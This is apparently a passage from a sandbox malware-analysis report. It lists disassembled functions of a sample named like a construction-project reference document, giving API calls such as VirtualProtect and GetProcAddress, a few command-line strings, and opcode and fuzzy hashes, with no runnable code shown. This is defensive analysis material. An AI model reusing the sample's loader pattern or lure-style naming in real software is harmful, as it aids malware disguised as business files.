                                                                                                                          • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB
                                                                                                                          Function 0040BA28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 421 40ba28-40ba3a 422 40ba87-40ba9b call 406c62 421->422 423 40ba3c-40ba52 call 407e20 _mbsicmp 421->423 445 40ba9d call 4107f1 422->445 446 40ba9d call 404734 422->446 447 40ba9d call 404785 422->447 448 40ba9d call 403c16 422->448 449 40ba9d call 410a9c 422->449 428 40ba54-40ba6d call 407e20 423->428 429 40ba7b-40ba85 423->429 434 40ba74 428->434 435 40ba6f-40ba72 428->435 429->422 429->423 431 40baa0-40bab3 call 407e30 438 40bab5-40bac1 431->438 439 40bafa-40bb09 SetCursor 431->439 437 40ba75-40ba76 call 40b5e5 434->437 435->437 437->429 441 40bac3-40bace 438->441 442 40bad8-40baf7 qsort 438->442 441->442 442->439 445->431 446->431 447->431 448->431 449->431
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Cursor_mbsicmpqsort
                                                                                                                          • String ID: /nosort$/sort
                                                                                                                          • API String ID: 882979914-1578091866
                                                                                                                          • Opcode ID: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                                                                                                          • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                                                                                          • Opcode Fuzzy Hash: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                                                                                                          • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                                                                                                          Function 0044B3CF Relevance: 7.6, APIs: 5, Instructions: 100libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                                            • Part of subcall function 0044B40E: GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                                                                                                            • Part of subcall function 0044B40E: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                                            • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                                            • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2099061454-0
                                                                                                                          • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                          • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                                                                                                                          • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                          • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                                                                                                                          Function 0044B42B Relevance: 7.6, APIs: 5, Instructions: 54librarymemoryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                                          • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                                          • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                                          • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2152742572-0
                                                                                                                          • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                          • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                                                                                                                          • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                          • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                                                                                                                          Function 00410DBB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74registryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,0040CF6F,74DF0A60,?,00000000), ref: 00410D1C
                                                                                                                            • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                                                          • memset.MSVCRT ref: 00410E10
                                                                                                                          • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                                          • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                                            • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                                          Strings
                                                                                                                          • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                          • API String ID: 889583718-2036018995
                                                                                                                          • Opcode ID: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                                                                                                          • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                                                                          • Opcode Fuzzy Hash: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                                                                                                          • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                                                                                                          Function 00410C68 Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                                                                                          • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Resource$FindLoadLockSizeof
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3473537107-0
                                                                                                                          • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                                          • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                                                                                                          • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                                          • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                                                                                                          Function 004109CF Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 004109F7
                                                                                                                            • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                                                            • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                                                                                          • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                                                          • memset.MSVCRT ref: 00410A32
                                                                                                                          • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3143880245-0
                                                                                                                          • Opcode ID: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                                                                                                          • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                                                                                          • Opcode Fuzzy Hash: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                                                                                                          • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                                                                                                          Function 0044B33B Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ??3@
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 613200358-0
                                                                                                                          • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                                          • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                                                                          • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                                          • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                                                                                                          Function 00408D34 Relevance: 5.0, APIs: 4, Instructions: 36COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,74DF0A60), ref: 00408D5C
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,74DF0A60), ref: 00408D7A
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,74DF0A60), ref: 00408D98
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,74DF0A60), ref: 00408DA8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ??2@
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1033339047-0
                                                                                                                          • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                                                          • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                                                                                                          • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                                                          • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                                                                                                                          Function 00406F30 Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • malloc.MSVCRT ref: 00406F4C
                                                                                                                          • memcpy.MSVCRT(00000000,00000000,00000000,00000000,74DF0A60,00407A43,00000001,?,00000000,74DF0A60,00407DBD,00000000,?,?), ref: 00406F64
                                                                                                                          • free.MSVCRT ref: 00406F6D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: freemallocmemcpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3056473165-0
                                                                                                                          • Opcode ID: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
                                                                                                                          • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                                                                                                                          • Opcode Fuzzy Hash: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
                                                                                                                          • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                                                                                                                          Function 00407088 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                                            • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                                                                                                          • CreateFontIndirectA.GDI32(?), ref: 004070A6
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFontIndirect_mbscpymemset
                                                                                                                          • String ID: Arial
                                                                                                                          • API String ID: 3853255127-493054409
                                                                                                                          • Opcode ID: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                                                                                                          • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                                                                                                                          • Opcode Fuzzy Hash: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                                                                                                          • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                                                                                                                          Function 0040CE70 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                                                                            • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                                                                            • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                                                                            • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                                                                            • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                                                                          • _strcmpi.MSVCRT ref: 0040CEC3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: strlen$_strcmpimemset
                                                                                                                          • String ID: /stext
                                                                                                                          • API String ID: 520177685-3817206916
                                                                                                                          • Opcode ID: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                                                                                                          • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                                                                                          • Opcode Fuzzy Hash: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                                                                                                          • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                                                                                          Function 00404734 Relevance: 3.0, APIs: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                                                                                                          • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 145871493-0
                                                                                                                          • Opcode ID: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                                                                                                          • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                                                                          • Opcode Fuzzy Hash: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                                                                                                          • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                                                                          Function 00410A6B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                                                            • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                                                            • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                                                            • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4165544737-0
                                                                                                                          • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                                          • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                                                                          • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                                          • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                                                                          Function 00404785 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeLibrary
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3664257935-0
                                                                                                                          • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                                          • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                                                                          • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                                          • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                                                                          Function 00406D1A Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,0040B01C,00000000,00000000,00000000,0044C52F,0044C52F,?,0040CF35,0044C52F), ref: 00406D2C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 823142352-0
                                                                                                                          • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                                          • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                                                                          • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                                          • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                                                                          Function 004107F1 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeLibrary
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3664257935-0
                                                                                                                          • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                                          • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                                                                          • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                                          • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                                                                          Function 00410CF3 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                          Download Yara Rule
